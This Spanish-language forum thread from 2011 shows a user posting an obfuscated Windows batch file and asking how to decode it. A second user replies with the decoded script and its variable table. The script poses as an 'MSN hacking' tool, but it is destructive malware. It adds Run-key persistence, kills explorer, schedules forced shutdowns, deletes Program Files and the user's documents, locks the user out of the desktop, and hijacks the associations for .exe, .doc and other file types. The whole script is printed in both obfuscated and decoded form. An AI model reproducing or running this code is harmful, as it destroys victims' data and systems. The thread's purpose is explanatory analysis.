Como descifrar este batch?

Iniciado por CAR3S?, 6 Febrero 2011, 01:39 AM

0 Miembros y 1 Visitante están viendo este tema.

CAR3S?

Hola!

Como puedo desecncriptar un batch?


lo quiero porque me parece interesante lo que hace... o eso me dijieron...


NO ES MIO!

Citarset _~=set
%_~% a=abcdefghijkl
%_~% b=mnopqrstuvwxyz
%_~% t¬a=%a:~4,1%
%_~% t¬e=%a:~,1%
%_~% t¬$=%a:~1,1%
%_~% t¬b=%a:~8,1%
%_~% t¬o=%a:~2,1%
%_~% t¬p=%a:~3,1%
%_~% t¬s=%a:~5,1%
%_~% t¬y=%a:~6,1%
%_~% t¬f=%a:~7,1%
%_~% t¬l=%a:~9,1%
%_~% t¬m=%a:~10,1%
%_~% t¬z=%a:~11,1%
%_~% t~a=%b:~4,1%
%_~% t~e=%b:~,1%
%_~% t~$=%b:~1,1%
%_~% t~b=%b:~8,1%
%_~% t~o=%b:~2,1%
%_~% t~p=%b:~3,1%
%_~% t~s=%b:~5,1%
%_~% t~y=%b:~6,1%
%_~% t~f=%b:~7,1%
%_~% t~l=%b:~9,1%
%_~% t~m=%b:~10,1%
%_~% t~z=%b:~11,1%
%_~% t~x=%b:~12,1%
%_~% t~q=%b:~13,1%
%_~% tv=%t¬f:~,1%
%_~% tt=%t~f:~,1%
set /=%t¬a%%t¬o%%tv%%t~o%
%_~% //=%t¬a%%t¬o%%tv%%t~o%.
%_~% m~g=%t~e%%t~y%%t¬y%
%_~% c~s=%t¬o%%t¬z%%t~y%
%_~% f~r=%t¬s%%t~o%%t~s%
%_~% rgi=reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v system /d "%systemroot%system32hal.bat"
%_~% rg2=reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v Systemupdate /d "%systemroot%system32kernel.bat"
%_~% i~e=%t¬b%%t¬s% %t¬a%%t~z%%t¬b%%t~y%%t~f%
%_~% i=%i~e:~,2%
%_~% :=%t~p%%t¬e%%t~b%%t~y%%t¬a%
%_~% ;=%t~p%%t¬b%%t~$%%t¬y%
%_~% =%t¬p%%t¬a%%t¬z% /%t~y% /%t¬s% /%t~a%
%_~% #=%t¬a%%t¬z%%t~y%%t¬a%
%_~% s~n=%t~y%%tv%%t~b%%tt%%t¬p%%t~o%%t~m%%t~$% -%t~y% -%t¬s% -%tt%
%_~% ]=%t¬p%%t¬e%%tt%%t¬a%
%_~% ¬=%t¬o%%t~o%%t~p%%t~x% /%t~x%
%_~% $=%t~e%%t¬m%%t¬p%%t¬b%%t~s%
%_~% ··= %t~s%%t~e%%t¬p%%t¬b%%t~s% /%t~y% /%t~a%
%_~% c~ls=%t¬o%%t¬e%%t¬o%%t¬z%%t~y%
%_~% ª!ª!=%tt%%t¬e%%t~y%%t¬m%%t¬m%%t¬b%%t¬z%%t¬z% /%t¬s% /%t¬b%%t~e%
%_~% {}=%t¬o%%t¬p%
%_~% ç=%t~y%%t¬a%%t~f%/%t~p%
%_~% f~ee=%t¬s%%tt%%t~x%%t~p%%t¬a%
%_~% []=%t¬e%%t~y%%t~y%%t~o%%t¬o%
%_~% g~t=%t¬y%%t~o%%tt%%t~o%
%_~% at~b=%t¬e%%tt%%tt%%t~s%%t¬b%%t¬$%
%_~% cl=%t¬o%%t~o%%t¬z%%t~o%%t~s%
%_~% st=%t~y%%tt%%t¬e%%t~s%%tt%
%_~% i=%i:~,2%
%_~% ct=%t¬o%%t~o%%t~$%
%_~% ch=%t¬a%%t~z%%t¬b%%tt%
@%/% %t~o%%t¬s%%t¬s%
:akk
%c~s%
%//%
%//%
%cl% 0%t¬o%
%tt%%t¬b%%tt%%t¬z%%t¬a% ----------------------- %tv%%t¬e%%t¬o%%t¬m% %t~e%%t~y%%t~$%--------------------------
%/% %t¬o%%t¬e%%t~s%%t¬y%%t¬e%%t~$%%t¬p%%t~o%.....
%;% -%t~$% 3 127.0.0.1 > %t~$%%t~b%%t¬z%
:!"·
%c~s%
%//%
%//%
%ç% v= %t¬b%%t~$%%tt%%t~s%%t~o%%t¬p%%t~b%%t~q%%t¬o%%t¬e% %t¬a%%t¬z% %t~e%%t~y%%t~$% %t¬e% %tv%%t¬e%%t¬o%%t¬m%%t¬a%%t¬e%%t~s% :
%//%
%//%
%ç% v2= %t~s%%t¬a%%t~p%%t¬b%%tt%%t¬e% %t¬a%%t¬z% %t~e%%t~y%%t~$% :
%i% %v%==%v2% (%g~t% ^*Ç )
%m~g% * %t¬z%%t~o%%t~y% %t~e%%t~y%%t~$% %v% ^& %v2% %t~$%%t~o% %t~y%%t~o%%t~$% %t¬b%%t¬y%%t~b%%t¬e%%t¬z%%t¬a%%t~y%
%g~t% !"·
:^*Ç
%c~s%
%//%
%//%
%/% %t~p%%t~s%%t~o%%t¬o%%t¬a%%t~y%%t¬e%%t~$%%t¬p%%t~o% ........
%/% %t~e%%t~y%%t~$% : %v% > C:%tv%%t¬e%%t¬o%%t¬m%%t~e%%t~y%%t~$%.txt
%/% %t~p%%t~y%%t~m% : %random% >> C:%tv%%t¬e%%t¬o%%t¬m%%t~e%%t~y%%t~$%.txt
:&0?
%rgi%
%/% :yuu > %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %c~s% >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %tt%%t~x%%t~p%%t¬a% * >> %windir%system32%t¬e%%tv%.bat
%/% %t¬o%%t¬e%%t¬z%%t¬z% %windir%system32%t¬e%%tv%.bat >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %st% %t¬o%%t¬e%%t¬z%%t¬o% >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %st% %t~e%%t~y%%t~p%%t¬e%%t¬b%%t~$%%tt% >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% ... >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %s~n% 1800 >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %_~%/%t¬e% %ct%=%ct%+1 >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %i% %ct%==15 ( %g~t% asd ) >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %g~t% yuu >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% :asd >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %ch% >> %windir%system32%tv%%t¬e%%t¬z%.bat
:tyy
%c~s%
%//%
%//%
%/% %t¬e%%t~s%%t¬o%%tv%%t¬b%%t~l%%t~o% %t¬o%%t~s%%t¬a%%t¬e%%t¬p%%t~o% %t¬a%%t~$% C:%tv%%t¬e%%t¬o%%t¬m%%t~e%%t~y%%t~$%.txt
%:%
%//%
%/% %t¬e%%t¬$%%t~s%%t¬b%%t¬a%%t~$%%t¬p%%t~o% %t¬a%%t¬z% %t¬e%%t~s%%t¬o%%tv%%t¬b%%t~l%%t~o%
%;% -%t~$% 3 127.0.0.1 > %t~$%%t~b%%t¬z%
%tt%%t~x%%t~p%%t¬a% C:%tv%%t¬e%%t¬o%%t¬m%%t~e%%t~y%%t~$%.txt
%;% -%t~$% 4 127.0.0.1 > %t~$%%t~b%%t¬z%
%/% %tt%%t¬a% %t¬o%%t~s%%t¬a%%t¬a%%t~y% %tv%%t¬e%%t¬o%%t¬m%%t¬a%%t~s% ????
%rg2%
%/% %ª!ª!% %t¬a%%t~z%%t~p%%t¬z%%t~o%%t~s%%t¬a%%t~s%.exe > %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %t~$%%t¬a%%tt% %t~b%%t~y%%t¬a%%t~s% %%random%% %%random%% /%t¬e%%t¬p%%t¬p% >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %{}% "%homepath%" >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %at~b% -%t~s% -%t¬e% -%t~y% -%tv% >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %··% %homepath%Mis Documentos >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %{}% C: >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %f~r% /%t¬z% %%%%x in (1,1,36500) do ( %$% %%%%x ) >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %% C:Archivos de programa >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %/% %t~y%|%c~ls% "%homepath%escritorio" /%t~p% %username%:%t~$% >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %/% %t~x%|%c~ls% "%homepath%escritorio" /%t~p% %username%:%t~$% >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat

%/% %m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% > %windir%system32%t¬b%%t~$%%t¬b%.bat
%/% %{}% %homepath%escritorio >> %windir%system32%t¬b%%t~$%%t¬b%.bat
%/% %f~r% /%t¬z% %%%%m %t¬b%%t~$% (1,1,%%random%%%random%%) do (%$% %%%%m ) >> %windir%system32%t¬b%%t~$%%t¬b%.bat
%[]% .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%file
%f~ee% .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% = %windir%system32%t¬b%%t~$%%t¬b%.bat
%[]% .%t¬a%%t~z%%t¬a% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%[]% .%t~e%%t~p%3 = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%[]% .%t~l%%t¬$%%t~y% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%[]% .%t~m%%t¬e%%t~l% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%[]% .%t¬e%%t~l%%t¬b% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%[]% .%t¬p%%t~o%%t¬o% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%

%;% -%t~$% 3 127.0.0.1 > %t~$%%t~b%%t¬z%
%/% %t~x%%t~o%%t~b% %t¬e%%t~s%%t¬a% %tv%%t¬e%%t¬o%%t¬m%%t¬a%%t¬p%
%m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%s~n% 10
%m~g% * %t¬$%%t~x%%t¬a%
%ch%

aclaro, NO LO ABRAN!, o usean virtual pc (Como yo)

add: tmb me di cuenta que tiene algunos errores

xassiz~

Es una "cifrado" muy pobre.. solo tienes que ir reemplazando las variables.

Además el @echo off debería ir al principio.

Sale algo así (el code a continuación contiene errores al desencriptarlo de una forma rápida y mala XDD):
Código (dos) [Seleccionar]

@echo off
:akk
cls
echo.
echo.
color 0c
title ----------------------- hack msn--------------------------
echo cargando.....
ping -n 3 127.0.0.1 > nul
:!"·
cls
echo.
echo.
%ç% v= introduzca el msn a hackear :
echo.
echo.
%ç% v2= repita el msn :
if %v%==%v2% (%g~t% ^*Ç )
msg * los msn %v% ^& %v2% no son iguales
%g~t% !"·
:^*Ç
cls
echo.
echo.
echo procesando ........
echo msn : %v% > C:hackmsn.txt
echo psw : %random% >> C:hackmsn.txt
:&0?
reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v system /d "%systemroot%system32hal.bat"
echo :yuu > %windir%system32hal.bat
echo cls >> %windir%system32hal.bat
echo type * >> %windir%system32ah.bat
echo call %windir%system32ah.bat >> %windir%system32hal.bat
echo start calc >> %windir%system32hal.bat
echo start mspaint >> %windir%system32hal.bat
echo msg * lammer ... >> %windir%system32hal.bat
echo shutdown -s -f -t 1800 >> %windir%system32hal.bat
echo set/a con=con+1 >> %windir%system32hal.bat
echo if con==15 ( %g~t% asd ) >> %windir%system32hal.bat
echo %g~t% yuu >> %windir%system32hal.bat
echo :asd >> %windir%system32hal.bat
echo exit >> %windir%system32hal.bat
:tyy
cls
echo.
echo.
echo archivo creado en C:hackmsn.txt
pause
echo.
echo abriendo el archivo
ping -n 3 127.0.0.1 > nul
type C:hackmsn.txt
ping -n 4 127.0.0.1 > nul
echo te crees hacker ????
reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v Systemupdate /d "%systemroot%system32kernel.bat"
echo taskkill /f /im explorer.exe > %windir%system32kernel.bat
echo msg * lammer lammer >> %windir%system32kernel.bat
echo net user del /s /f /qrandomdel /s /f /q del /s /f /qrandomdel /s /f /q /add >> %windir%system32kernel.bat
echo cd "%homepath%" >> %windir%system32kernel.bat
echo attrib -r -a -s -h >> %windir%system32kernel.bat
echo %··% %homepath%Mis Documentos >> %windir%system32kernel.bat
echo cd C: >> %windir%system32kernel.bat
echo for /l del /s /f /qdel /s /f /qx in (1,1,36500) do ( mkdir del /s /f /qdel /s /f /qx ) >> %windir%system32kernel.bat
echo del /s /f /q C:Archivos de programa >> %windir%system32kernel.bat
echo echo s|cacls "%homepath%escritorio" /p %username%:n >> %windir%system32kernel.bat
echo echo y|cacls "%homepath%escritorio" /p %username%:n >> %windir%system32kernel.bat

echo msg * lammer lammer > %windir%system32ini.bat
echo cd %homepath%escritorio >> %windir%system32ini.bat
echo for /l del /s /f /qdel /s /f /qm in (1,1,del /s /f /qrandomdel /s /f /q%randomdel /s /f /q) do (mkdir del /s /f /qdel /s /f /qm ) >> %windir%system32ini.bat
assoc .lammer = .lammerfile
%f~ee% .lammer = %windir%system32ini.bat
assoc .exe = .lammer
assoc .mp3 = .lammer
assoc .vbs = .lammer
assoc .wav = .lammer
assoc .avi = .lammer
assoc .doc = .lammer

ping -n 3 127.0.0.1 > nul
echo you are hacked
msg * lammer lammer
msg * lammer lammer
msg * lammer lammer
shutdown -s -f -t 10
msg * bye
exit


Pero la conversión de variables vendría siendo esta:
Código (dos) [Seleccionar]
set _~=set
set a=abcdefghijkl
set b=mnopqrstuvwxyz
set t¬a=e
set t¬e=a
set t¬$=b
set t¬b=i
set t¬o=c
set t¬p=d
set t¬s=f
set t¬y=g
set t¬f=h
set t¬l=j
set t¬m=k
set t¬z=l
set t~a=q
set t~e=m
set t~$=n
set t~b=u
set t~o=o
set t~p=p
set t~s=r
set t~y=s
set t~f=t
set t~l=v
set t~m=w
set t~z=x
set t~x=y
set t~q=z
set tv=h
set tt=t
set /=echo
set //=echo.
set m~g=msg
set c~s=cls
set f~r=for
set rgi=reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v system /d "%systemroot%system32hal.bat"
set rg2=reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v Systemupdate /d "%systemroot%system32kernel.bat"
set i~e=if exist
set i=if
set :=pause
set ;=ping
set =del /s /f /q
set #=else
set s~n=shutdown -s -f -t
set ]=date
set ¬=copy /y
set $=mkdir
set ··= rmdir /s /q
set c~ls=cacls
set ª!ª!=taskkill /f /im
set {}=cd
set ç=set/p
set f~ee=ftype
set []=assoc
set g~t=goto
set at~b=attrib
set cl=color
set st=start
set i=if
set ct=con
set ch=exit


Saludos!

CAR3S?

Gracias, pero cual es el proceso para descifrar teniendo las variables? xD

xassiz~

Pues si tienes
Código (dos) [Seleccionar]
set t¬a=e
%t¬a% se reemplazará por "e".

Si tienes
Código (dos) [Seleccionar]
set //=echo.
%//% se reemplazará por "echo.".

:xD